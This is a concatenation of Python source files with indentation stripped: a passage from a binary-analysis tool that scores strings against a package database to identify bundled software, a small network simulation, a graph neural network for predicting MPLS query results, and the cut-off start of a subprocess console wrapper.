## skip empty lines (only triggered if stringcutoff == 0)
if line == "":
continue
lock.acquire()
if line in unmatchedignorecache:
lock.release()
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
continue
lock.release()
if len(line) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
## An extra check for lines that score extremely low. This
## helps reduce load on databases stored on slower disks. Only used if
## precomputescore is set and "source order" is False.
if precomputescore:
cursor.execute(precomputequery, (line,))
scoreres = cursor.fetchone()
conn.commit()
if scoreres != None:
## If the score is so low it will not have any influence on the final
## score, why even bother hitting the disk?
## Since there might be package rewrites this should be a bit less than the
## cut off value that was defined.
if scoreres[0] < scorecutoff/100:
nonUniqueMatchLines.append(line)
matchednonassignedlines += 1
matchednonassigned = True
linecount[line] = linecount[line] - 1
continue
## if scoreres is None the line could still be something else like a kernel function, or a
## kernel string in a different format, so keep searching.
## If the image is a Linux kernel image first try Linux kernel specific matching
## like function names, then continue as normal.
if linuxkernel:
## This is where things get a bit ugly. The strings in a Linux
## kernel image could also be function names, not string constants.
## There could be false positives here...
if scankernelfunctions:
cursor.execute(kernelquery, (line,))
kernelres = cursor.fetchall()
conn.commit()
if len(kernelres) != 0:
kernelfuncres.append(line)
kernelfunctionmatched = True
linecount[line] = linecount[line] - 1
continue
## then see if there is anything in the cache at all
try:
cursor.execute(stringquery, (line,))
except:
conn.commit()
## something weird is going on here, probably
## with encodings, so just ignore the line for
## now.
## One example is com.addi_40_src/src/com/addi/toolbox/crypto/aes.java
## from F-Droid. At line 221 there is a string SS.
## This string poses a problem.
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
res = cursor.fetchall()
conn.commit()
if len(res) == 0 and linuxkernel:
## make a copy of the original line
origline = line
## try a few variants that could occur in the Linux kernel
## The values of KERN_ERR and friends have changed in the years.
## In 2.6 it used to be for example <3> (defined in include/linux/kernel.h
## or include/linux/printk.h )
## In later kernels this was changed.
matchres = reerrorlevel.match(line)
if matchres != None:
scanline = line.split('>', 1)[1]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
line = scanline
else:
scanline = scanline.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
else:
## In include/linux/kern_levels.h since kernel 3.6 a different format is
## used. TODO: actually check in the binary whether or not a match (if any)
## is preceded by 0x01
matchres = rematch.match(line)
if matchres != None:
scanline = line[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
if len(res) == 0:
scanline = line.split(':', 1)
if len(scanline) > 1:
scanline = scanline[1]
if scanline.startswith(" "):
scanline = scanline[1:]
if len(scanline) < stringcutoff:
ignored.append(line)
linecount[line] = linecount[line] - 1
continue
cursor.execute(stringquery, (scanline,))
res = cursor.fetchall()
conn.commit()
if len(res) != 0:
if len(scanline) != 0:
line = scanline
## result is still empty, perhaps it is a module parameter. TODO
if len(res) == 0:
if '.' in line:
if line.count('.') == 1:
paramres = reparam.match(line)
if paramres != None:
pass
## if 'line' has been changed, then linecount should be changed accordingly
if line != origline:
linecount[origline] = linecount[origline] - 1
if line in linecount:
linecount[line] = linecount[line] + 1
else:
linecount[line] = 1
## nothing in the cache
if len(res) == 0:
unmatched.append(line)
unmatchedlines += 1
linecount[line] = linecount[line] - 1
lock.acquire()
unmatchedignorecache[line] = 1
lock.release()
continue
if len(res) != 0:
## Assume:
## * database has no duplicates
## * filenames in the database have been processed using os.path.basename()
if scandebug:
print >>sys.stderr, "\n%d matches found for <(|%s|)> in %s" % (len(res), line, filename)
pkgs = {} ## {package name: set([filenames without path])}
filenames = {}
## For each string determine in how many packages (without version) the string
## is found.
## If the string is only found in one package the string is unique to the package
## so record it as such and add its length to a score.
for result in res:
(package, sourcefilename) = result
if package in clones:
package = clones[package]
if not package in pkgs:
pkgs[package] = set([sourcefilename])
else:
pkgs[package].add(sourcefilename)
if not sourcefilename in filenames:
filenames[sourcefilename] = [package]
else:
filenames[sourcefilename] = list(set(filenames[sourcefilename] + [package]))
scalar = 1
if len(pkgs) != 1:
nonUniqueMatchLines.append(line)
## The string found is not unique to a package, but is it
## unique to a filename?
## This method assumes that files that are named the same
## also contain the same or similar content. This could lead
## to incorrect results.
## now determine the score for the string
try:
score = (1 * scalar) / pow(alpha, (len(filenames) - 1))
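## example: with the default alpha of 5.0 a string that appears in two
## distinct filenames gets a score of 1/5 = 0.2, in three filenames 1/25, etc.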
except Exception, e:
## pow(alpha, (len(filenames) - 1)) is overflowing here
## so the score would be very close to 0. The largest value
## is sys.maxint, so use that one. The score will be
## smaller than almost any value of scorecutoff...
if usesourceorder:
score = (1 * scalar) / sys.maxint
else:
matchednonassigned = True
matchednonassignedlines += 1
linecount[line] = linecount[line] - 1
continue
## if it is assumed that the compiler puts string constants in the
## same order in the generated code then strings can be assigned
## to the package directly
if usesourceorder:
if uniquepackage_tmp in pkgs:
assign_string = False
assign_filename = None
for pf in uniquefilenames_tmp:
if pf in pkgs[uniquepackage_tmp]:
assign_string = True
assign_filename = pf
break
if assign_string:
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [line]
else:
nonUniqueMatches[uniquepackage_tmp].append(line)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((line, assign_filename, score))
else:
directAssignedString[uniquepackage_tmp] = [(line, assign_filename, score)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
matchedlines += 1
linecount[line] = linecount[line] - 1
continue
else:
## store pkgs and line for backward lookups
backlog.append((line, pkgs[uniquepackage_tmp], score))
if not score > scorecutoff:
matchednonassigned = True
matchednonassignedlines += 1
if not usesourceorder:
linecount[line] = linecount[line] - 1
continue
## After having computed a score, determine if the files
## the string was found in are all named the same.
## filenames {name of file: { name of package: 1} }
if filter(lambda x: len(filenames[x]) != 1, filenames.keys()) == []:
matchednotclonelines += 1
for fn in filenames:
## The filename fn containing the matched string can only
## be found in one package.
## For example: string 'foobar' is present in 'foo.c' in package 'foo'
## and 'bar.c' in package 'bar', but not in 'foo.c' in package 'bar'
## or 'bar.c' in foo (if any).
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey,0) + score
matchednotclones = True
if not usesourceorder:
linecount[line] = linecount[line] - 1
notclones.append((line, filenames))
else:
notclonesbacklog.append((line, filenames))
continue
else:
for fn in filenames:
## There are multiple packages in which the same
## filename contains this string, for example 'foo.c'
## in packages 'foo' and 'bar'. This is likely to be
## internal cloning in the repo. This string is
## assigned to a single package in the loop below.
## Some strings will not significantly contribute to the score, so they
## could be ignored and not added to the list.
## For now exclude them, but in the future they could be included for
## completeness.
stringsLeft['%s\t%s' % (line, fn)] = {'string': line, 'score': score, 'filename': fn, 'pkgs' : filenames[fn]}
## lookup
else:
## the string is unique to this package and this package only
uniquematch = True
## store the uniqueMatches without any information about checksums
if not package in uniqueMatches:
uniqueMatches[package] = [(line, [])]
else:
uniqueMatches[package].append((line, []))
linecount[line] = linecount[line] - 1
if usesourceorder:
uniquepackage_tmp = package
uniquefilenames_tmp = pkgs[package]
## process backlog
for b in xrange(len(backlog), 0, -1):
assign_string = False
assign_filename = None
(backlogline, backlogfilenames, backlogscore) = backlog[b-1]
for pf in uniquefilenames_tmp:
if pf in backlogfilenames:
assign_string = True
assign_filename = pf
break
if assign_string:
## keep track of the old score in case it is changed/recomputed here
oldbacklogscore = backlogscore
if not nonUniqueMatches.has_key(uniquepackage_tmp):
nonUniqueMatches[uniquepackage_tmp] = [backlogline]
else:
nonUniqueMatches[uniquepackage_tmp].append(backlogline)
if directAssignedString.has_key(uniquepackage_tmp):
directAssignedString[uniquepackage_tmp].append((backlogline, assign_filename, backlogscore))
else:
directAssignedString[uniquepackage_tmp] = [(backlogline, assign_filename, backlogscore)]
matcheddirectassignedlines += 1
nonUniqueAssignments[uniquepackage_tmp] = nonUniqueAssignments.get(uniquepackage_tmp,0) + 1
## remove the directly assigned string from stringsLeft,
## at least for *this* package
try:
for pf in backlogfilenames:
del stringsLeft['%s\t%s' % (backlogline, pf)]
except KeyError, e:
pass
## decrease matchednonassigned if the originally computed score
## is too low
if not oldbacklogscore > scorecutoff:
matchednonassignedlines = matchednonassignedlines - 1
linecount[backlogline] = linecount[backlogline] - 1
for cl in notclonesbacklog:
(notclone, filenames) = cl
if notclone == backlogline:
matchednotclonelines -= 1
for fn in filenames:
fnkey = filenames[fn][0]
nonUniqueScore[fnkey] = nonUniqueScore.get(fnkey) - backlogscore
notclonesbacklog.remove(cl)
break
else:
break
## store notclones for later use
notclones += notclonesbacklog
backlog = []
notclonesbacklog = []
matched = True
## for statistics it's nice to see how many lines were matched
matchedlines += 1
## clean up stringsLeft first
for l in stringsLeft.keys():
if linecount[stringsLeft[l]['string']] == 0:
del stringsLeft[l]
## done looking up and assigning all the strings
uniqueScore = {}
for package in uniqueMatches:
if not package in uniqueScore:
uniqueScore[package] = 0
for line in uniqueMatches[package]:
uniqueScore[package] += (1 * scalar)
directAssignedScore = {}
for package in directAssignedString:
if not package in directAssignedScore:
directAssignedScore[package] = 0
for line in directAssignedString[package]:
directAssignedScore[package] += line[2]
## If the string is not unique, do a little bit more work to determine which
## file is the most likely, so also record the filename.
##
## 1. determine whether the string is unique to a package
## 2. if not, determine which filenames the string is in
## 3. for each filename, determine whether or not this file (containing the string)
## is unique to a package
## 4. if not, try to determine the most likely package the string was found in
## For each string that occurs in the same filename in multiple
## packages (e.g., "debugXML.c", a cloned file of libxml2 in several
## packages), assign it to one package. We do this by picking the
## package that would gain the highest score increment across all
## strings that are left. This is repeated until no strings are left.
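## Example: a leftover string from debugXML.c occurs both in libxml2 and in a
## package that bundles libxml2. If libxml2 has the higher unique score, only
## libxml2 survives in pkgsScorePerString for that string, so the string's
## score counts towards libxml2's gain and it is eventually credited there.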
pkgsScorePerString = {}
for stri in stringsLeft:
pkgsSortedTmp = map(lambda x: {'package': x, 'uniquescore': uniqueScore.get(x, 0)}, stringsLeft[stri]['pkgs'])
## get the unique score per package and sort in reverse order
pkgsSorted = sorted(pkgsSortedTmp, key=lambda x: x['uniquescore'], reverse=True)
## and get rid of the unique scores again. Now it's sorted.
pkgsSorted = map(lambda x: x['package'], pkgsSorted)
pkgs2 = []
for pkgSort in pkgsSorted:
if uniqueScore.get(pkgSort, 0) == uniqueScore.get(pkgsSorted[0], 0):
pkgs2.append(pkgSort)
pkgsScorePerString[stri] = pkgs2
newgain = {}
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
newgain[p2] = newgain.get(p2, 0) + stringsLeft[stri]['score']
useless_packages = set()
for p in newgain.keys():
## check if packages could ever contribute usefully.
if newgain[p] < gaincutoff:
useless_packages.add(p)
## walk through the data again, filter out useless stuff
new_stringsleft = {}
string_split = {}
for stri in stringsLeft:
## filter out the strings that only occur in packages that will contribute
## to the score. Ignore the rest.
if filter(lambda x: x not in useless_packages, pkgsScorePerString[stri]) != []:
new_stringsleft[stri] = stringsLeft[stri]
strsplit = stri.rsplit('\t', 1)[0]
if strsplit in string_split:
string_split[strsplit].add(stri)
else:
string_split[strsplit] = set([stri])
## the difference between stringsLeft and new_stringsleft is matched
## but unassigned if the strings *only* occur in stringsLeft
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
for i in oldstrleft.difference(set(string_split.keys())):
matchednonassignedlines += linecount[i]
matchedlines -= linecount[i]
stringsLeft = new_stringsleft
roundNr = 0
strleft = len(stringsLeft)
## keep track of which strings were already found. This is because each string
## is only considered once anyway.
while strleft > 0:
roundNr = roundNr + 1
#if scandebug:
# print >>sys.stderr, "\nround %d: %d strings left" % (roundNr, strleft)
gain = {}
stringsPerPkg = {}
## cleanup
if roundNr != 0:
todelete = set()
for stri in stringsLeft:
if linecount[stringsLeft[stri]['string']] == 0:
todelete.add(stri)
for a in todelete:
del stringsLeft[a]
oldstrleft = set()
for i in stringsLeft:
oldstrleft.add(stringsLeft[i]['string'])
## Determine to which packages the remaining strings belong.
newstrleft = set()
for stri in stringsLeft:
for p2 in pkgsScorePerString[stri]:
if p2 in useless_packages:
continue
gain[p2] = gain.get(p2, 0) + stringsLeft[stri]['score']
if not p2 in stringsPerPkg:
stringsPerPkg[p2] = []
stringsPerPkg[p2].append(stri)
newstrleft.add(stringsLeft[stri]['string'])
for i in oldstrleft.difference(newstrleft):
if linecount[i] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[i] -= 1
for p2 in gain.keys():
## check if packages could ever contribute usefully.
if gain[p2] < gaincutoff:
useless_packages.add(p2)
## gain_sorted contains the sort order, gain contains the actual data
gain_sorted = sorted(gain, key = lambda x: gain.__getitem__(x), reverse=True)
if gain_sorted == []:
break
## so far value is the best, but that might change
best = gain_sorted[0]
## Possible optimisation: skip the last step if the gain is not high enough
if filter(lambda x: x[1] > gaincutoff, gain.items()) == []:
break
## if multiple packages have a big enough gain, add them to 'close'
## and 'fight' to see which package is the most likely hit.
close = filter(lambda x: gain[x] > (gain[best] * 0.9), gain_sorted)
## Let's hope "sort" terminates on a comparison function that
## may not actually be a proper ordering.
if len(close) > 1:
#if scandebug:
# print >>sys.stderr, " doing battle royale between", close
## reverse sort close, then best = close_sorted[0][0]
for c in close:
if avgscores[language].get(c) is None:
avgscores[language][c] = 0
close_sorted = map(lambda x: (x, avgscores[language][x]), close)
close_sorted = sorted(close_sorted, key = lambda x: x[1], reverse=True)
## If we don't have a unique score *at all* it is likely that everything
## is cloned. There could be a few reasons:
## 1. there are duplicates in the database due to renaming
## 2. package A is completely contained in package B (bundling).
## If there are no hits for package B, it is more likely we are
## actually seeing package A.
if uniqueScore == {}:
best = close_sorted[-1][0]
else:
best = close_sorted[0][0]
#if scandebug:
# print >>sys.stderr, " %s won" % best
best_score = 0
## for each string in the package with the best gain add the score
## to the package and move on to the next package.
todelete = set()
for xy in stringsPerPkg[best]:
x = stringsLeft[xy]
strsplit = xy.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
## is this correct here? There are situations where one
## string appears multiple times in a single source file
## and also the binary (eapol_sm.c in hostapd 0.3.9 contains
## the string "%s state=%s" several times and binaries
## do too.)
todelete.add(strsplit)
continue
sameFileScore[best] = sameFileScore.get(best, 0) + x['score']
best_score += 1
linecount[strsplit] = linecount[strsplit] - 1
if best in nonUniqueMatches:
nonUniqueMatches[best].append(strsplit)
else:
nonUniqueMatches[best] = [strsplit]
for a in todelete:
for st in string_split[a]:
del stringsLeft[st]
## store how many non unique strings were assigned per package
nonUniqueAssignments[best] = nonUniqueAssignments.get(best,0) + best_score
if gain[best] < gaincutoff:
break
strleft = len(stringsLeft)
for i in stringsLeft:
strsplit = i.rsplit('\t', 1)[0]
if linecount[strsplit] == 0:
continue
matchednonassignedlines += 1
matchedlines -= 1
linecount[strsplit] -= 1
scores = {}
for k in set(uniqueScore.keys() + sameFileScore.keys()):
scores[k] = uniqueScore.get(k, 0) + sameFileScore.get(k, 0) + nonUniqueScore.get(k,0) + directAssignedScore.get(k,0)
scores_sorted = sorted(scores, key = lambda x: scores.__getitem__(x), reverse=True)
rank = 1
reports = []
if scores == {}:
totalscore = 0.0
else:
totalscore = float(reduce(lambda x, y: x + y, scores.values()))
for s in scores_sorted:
try:
percentage = (scores[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatches.get(s,[]), 'uniquematcheslen': len(uniqueMatches.get(s,[])), 'percentage': percentage, 'packageversions': packageversions.get(s, {}), 'packagelicenses': packagelicenses.get(s, []), 'packagecopyrights': packagecopyrights.get(s,[])})
rank = rank+1
if matchedlines == 0 and unmatched == []:
res = None
else:
if scankernelfunctions:
matchedlines = matchedlines - len(kernelfuncres)
lenlines = lenlines - len(kernelfuncres)
ignored = list(set(ignored))
ignored.sort()
res = {'matchedlines': matchedlines, 'extractedlines': lenlines, 'reports': reports, 'nonUniqueMatches': nonUniqueMatches, 'nonUniqueAssignments': nonUniqueAssignments, 'unmatched': unmatched, 'scores': scores, 'unmatchedlines': unmatchedlines, 'matchednonassignedlines': matchednonassignedlines, 'matchednotclonelines': matchednotclonelines, 'matcheddirectassignedlines': matcheddirectassignedlines, 'ignored': list(set(ignored))}
else:
res = None
## then look up results for function names, variable names, and so on.
if language == 'C':
if linuxkernel:
functionRes = {}
if 'BAT_KERNELSYMBOL_SCAN' in scanenv:
namekernelquery = "select distinct package from linuxkernelnamecache where varname=%s"
variablepvs = scankernelsymbols(leafreports['identifier']['kernelsymbols'], scanenv, namekernelquery, cursor, conn, clones)
## TODO: clean up
if leafreports['identifier'].has_key('kernelfunctions'):
if leafreports['identifier']['kernelfunctions'] != []:
functionRes['kernelfunctions'] = copy.deepcopy(leafreports['identifier']['kernelfunctions'])
else:
(functionRes, variablepvs) = scanDynamic(leafreports['identifier']['functionnames'], leafreports['identifier']['variablenames'], scanenv, cursor, conn, clones)
elif language == 'Java':
if not ('BAT_CLASSNAME_SCAN' in scanenv or 'BAT_FIELDNAME_SCAN' in scanenv or 'BAT_METHOD_SCAN' in scanenv):
variablepvs = {}
functionRes = {}
else:
(functionRes, variablepvs) = extractJava(leafreports['identifier'], scanenv, cursor, conn, clones)
else:
variablepvs = {}
functionRes = {}
## then write results back to disk. This needs to be done because results for
## Java might need to be aggregated first.
leafreports['ranking'] = (res, functionRes, variablepvs, language)
leafreports['tags'].append('ranking')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
cPickle.dump(leafreports, leaf_file)
leaf_file.close()
reportqueue.put(filehash)
scanqueue.task_done()
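## Check which cache tables exist in the database and enable the
## corresponding scans in a copy of the scan environment. Returns
## (True, newenv) on success, or (False, {}) if there is no database cursor.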
def licensesetup(scanenv, cursor, conn, debug=False):
if cursor == None:
return (False, {})
cursor.execute("select table_name from information_schema.tables where table_type='BASE TABLE' and table_schema='public'")
tablenames = map(lambda x: x[0], cursor.fetchall())
conn.commit()
## Now verify the names of the tables
newenv = copy.deepcopy(scanenv)
supported_languages = set()
## for Java
if 'stringscache_java' in tablenames:
supported_languages.add('Java')
else:
if 'Java' in supported_languages:
supported_languages.remove('Java')
if 'Java' in supported_languages:
if 'classcache_java' in tablenames:
newenv['BAT_CLASSNAME_SCAN'] = 1
else:
if 'BAT_CLASSNAME_SCAN' in newenv:
del newenv['BAT_CLASSNAME_SCAN']
if 'fieldcache_java' in tablenames:
newenv['BAT_FIELDNAME_SCAN'] = 1
else:
if 'BAT_FIELDNAME_SCAN' in newenv:
del newenv['BAT_FIELDNAME_SCAN']
if 'functionnamecache_java' in tablenames:
newenv['BAT_METHOD_SCAN'] = 1
else:
if 'BAT_METHOD_SCAN' in newenv:
del newenv['BAT_METHOD_SCAN']
## for C
if 'stringscache_c' in tablenames:
supported_languages.add('C')
else:
if 'C' in supported_languages:
supported_languages.remove('C')
if 'C' in supported_languages:
if 'varnamecache_c' in tablenames:
newenv['BAT_VARNAME_SCAN'] = 1
if 'functionnamecache_c' in tablenames:
newenv['BAT_FUNCTION_SCAN'] = 1
## for Linux kernel
if 'linuxkernelnamecache' in tablenames:
newenv['BAT_KERNELSYMBOL_SCAN'] = 1
if 'linuxkernelfunctionnamecache' in tablenames:
newenv['BAT_KERNELFUNCTION_SCAN'] = 1
if 'renames' in tablenames:
newenv['HAVE_CLONE_DB'] = 1
supported_languages = list(supported_languages)
newenv['supported_languages'] = supported_languages
return (True, newenv)
|
simulation_1.py
|
import network_1
import link_1
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_1.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link_1.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_1.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d, Sample data, Sample data, Sample data, Sample data, Sample data, Sample data' % i)
#client.udt_send(2, 'Sample data %d, Sample data, Sample data, Sample data' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
neural_network_qpred.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019 Fabien Geyer
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import re
import sys
import glob
import gzip
import json
import tarfile
import argparse
import numpy as np
import networkx as nx
import multiprocess as mp
from tqdm import tqdm, trange
import torch
import torch.nn as nn
import torch_geometric.nn as gnn
from torch_geometric.data import Data, DataLoader
sys.path.insert(0, 'P-Rex')
from prex.prnml import xml
from graph_transformation import mpls2graph, NodeType
class GNNModel(gnn.MessagePassing):
def __init__(self, num_features, num_classes, args):
super(GNNModel, self).__init__()
# First layers
self.fci = nn.Sequential(*[
nn.Linear(num_features, args.hidden_size),
nn.LeakyReLU(),
nn.Dropout(args.dropout),
])
self.cell = gnn.GatedGraphConv(args.hidden_size, args.nunroll)
# Final layers
self.fco = nn.Sequential(*[
nn.Linear(args.hidden_size, args.hidden_size),
nn.LeakyReLU(),
nn.Dropout(args.dropout),
nn.Linear(args.hidden_size, num_classes),
])
def forward(self, data):
x = self.fci(data.x)
x = self.cell(x, data.edge_index)
x = self.fco(x)
return x
def graph2torch(G):
"""
Transforms a networkx graph generated by `mpls2graph` to its matrix representation.
Returns a torch_geometric.data.Data object
"""
# Unique id for each node in the graph
ids = dict(zip(G.nodes(), range(G.number_of_nodes())))
# Node features
x = torch.zeros((G.number_of_nodes(), len(NodeType)))
# Label corresponds here to the prediction of the query output
y = torch.zeros(G.number_of_nodes(), dtype=torch.int64)
# Mask used for selecting the query node in the loss function.
# See torch.index_select(...) in training function
mask = torch.zeros(G.number_of_nodes(), dtype=torch.bool)
for node, data in G.nodes(data=True):
nid = ids[node]
x[nid, data["ntype"] - 1] = 1 # One-hot encoding of node type
if "pred" in data:
y[nid] = data["pred"]
mask[nid] = True
edge_index = torch.zeros((2, G.number_of_edges() * 2), dtype=torch.int64)
i = 0
for src, dst in G.edges():
# Each edge from the undirected graph G is encoded as two directed edges
edge_index[0, i] = ids[src]
edge_index[1, i] = ids[dst]
i += 1
edge_index[0, i] = ids[dst]
edge_index[1, i] = ids[src]
i += 1
return Data(x=x, edge_index=edge_index, y=y, mask=mask)
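# Sketch of typical use (network, query and k are placeholders here):
#     G = mpls2graph(network, query, k)
#     data = graph2torch(G)
# data.x has shape (num_nodes, len(NodeType)); data.mask marks the query node.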
def graph2torch_worker(networks, qwork, qresults):
while True:
query = qwork.get()
if query is None:
break
q, k = re.search(r"^(.+)\s([0-9]+)$", query["query"]).groups()
G = mpls2graph(networks[query["network"]], q, int(k))
G.nodes[NodeType.Query]["pred"] = query["query_result"]
data = graph2torch(G)
qresults.put(data)
def prepare_dataset(args, netfiles, tqdm_desc):
dataset = []
mgr = mp.Manager()
qwork = mgr.Queue()
qresults = mgr.Queue()
for netfile in tqdm(netfiles, ncols=0, desc=tqdm_desc):
# First parse the tar file and the networks it contains
tar = tarfile.open(netfile, "r")
networks = {}
network_names = set(map(lambda n: os.path.split(n)[0], tar.getnames()))
for name in tqdm(network_names, desc="Parse networks", ncols=0, leave=False):
topo = tar.extractfile(os.path.join(name, "topo.xml"))
routing = tar.extractfile(os.path.join(name, "routing.xml"))
networks[name] = xml.read_network(topo, routing)
topo.close()
routing.close()
tar.close()
# Start workers for processing and building the graphs in parallel
workers = []
for _ in range(mp.cpu_count()):
worker = mp.Process(target=graph2torch_worker, args=(networks, qwork, qresults))
worker.start()
workers.append(worker)
# Parse queries and their results
jsonfile = netfile.replace(".xmls.tgz", ".queries.json.gz")
with gzip.open(jsonfile, "rt") as f:
queries = json.load(f)
# Push queries to workers
nqueries = 0
for query in queries:
qwork.put(query)
nqueries += 1
# Send None to notify workers that there's no more work
for _ in range(len(workers)):
qwork.put(None)
for _ in trange(nqueries, ncols=0, desc="Build graphs", leave=False):
dataset.append(qresults.get())
# Shutdown workers
for worker in workers:
worker.join()
mgr.shutdown()
return dataset
def main(args):
# Initialize random seeds
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# Find dataset files and split them in train and eval
netfiles = sorted(glob.glob(args.dataset_path))
if args.nnetworks < 2:
netfiles = np.array(netfiles)
else:
netfiles = np.array(netfiles[:args.nnetworks])
train_mask = np.random.rand(len(netfiles)) < args.train_test_split
if np.all(train_mask):
# Make sure that we have at least one dataset for evaluation
train_mask[np.random.randint(len(netfiles))] = False
# Parse dataset and transforms it to graph objects
dataset_train = prepare_dataset(args, netfiles[train_mask], "Build train dataset")
dataset_eval = prepare_dataset(args, netfiles[~train_mask], "Build eval dataset")
loader_train = DataLoader(dataset_train, batch_size=args.batch_size)
loader_eval = DataLoader(dataset_eval, batch_size=args.batch_size)
print(f"Dataset size: train={len(dataset_train)} eval={len(dataset_eval)}")
if args.cpu:
device = torch.device("cpu")
else:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.cuda.manual_seed(args.seed)
# Initialize model
model = GNNModel(len(NodeType), 2, args)
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
criterion = nn.CrossEntropyLoss()
# Main loop
for epoch in trange(args.epochs, ncols=0):
losses_train = []
metrics_train = []
metrics_eval = []
# Train model on training data
model.train()
for data in loader_train:
optimizer.zero_grad()
output = model(data.to(device))
# Select only the relevant nodes for the loss function
idxmask = torch.where(data.mask)[0]
mlabels = torch.index_select(data.y, 0, idxmask)
moutput = torch.index_select(output, 0, idxmask)
loss = criterion(moutput, mlabels)
losses_train.append(loss.item())
loss.backward()
optimizer.step()
choices = torch.argmax(moutput, axis=1)
metric = choices == mlabels
metrics_train.extend(metric.tolist())
# Use model on eval data
model.eval()
for data in loader_eval:
with torch.no_grad():
output = model(data.to(device))
idxmask = torch.where(data.mask)[0]
mlabels = torch.index_select(data.y, 0, idxmask)
moutput = torch.index_select(output, 0, idxmask)
choices = torch.argmax(moutput, axis=1)
metric = choices == mlabels
metrics_eval.extend(metric.tolist())
tqdm.write(f"{epoch:3d} | loss={np.mean(losses_train):.2e} metric={np.mean(metrics_train)*100:.2f} | test={np.mean(metrics_eval)*100:.2f}")
if __name__ == "__main__":
p = argparse.ArgumentParser()
p.add_argument("--seed", type=int, default=1, help="Seed used for random number generator")
p.add_argument("--dataset-path", type=str, default="dataset-networking2019/dataset/qpred/*/*.xmls.tgz")
p.add_argument("--nnetworks", type=int, default=0, help="Number of networks to load (0=all)")
p.add_argument("--epochs", type=int, default=15, help="Number of epochs for training")
p.add_argument("--learning-rate", type=float, default=5e-4, help="Learning rate for Adam")
p.add_argument("--dropout", type=float, default=.5, help="Dropout used for between the linear layers")
p.add_argument("--train-test-split", type=float, default=.75)
p.add_argument("--batch-size", type=int, default=16, help="Batch size")
p.add_argument("--hidden-size", type=int, default=64, help="Size of the hidden messages")
p.add_argument("--nunroll", type=int, default=10, help="Number of loop unrolling for the Gated Graph NN")
p.add_argument("--cpu", action="store_true", help="Disable use of GPU")
args = p.parse_args()
main(args)
|
console.py
|
'''
:File: console.py
:Author: Jayesh Joshi
:Email: jayeshjo1@utexas.edu
'''
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue
from ._decorators import timeout
from .exceptions import ConsoleExecTimeout
class ConsoleExecutor():
'''
Simple wrapper around subprocess to provide a non-blocking read from
stdout and stderr. This executor will start the subprocess using
universal_newlines=True, shell=False, and start_new_session=True to provide
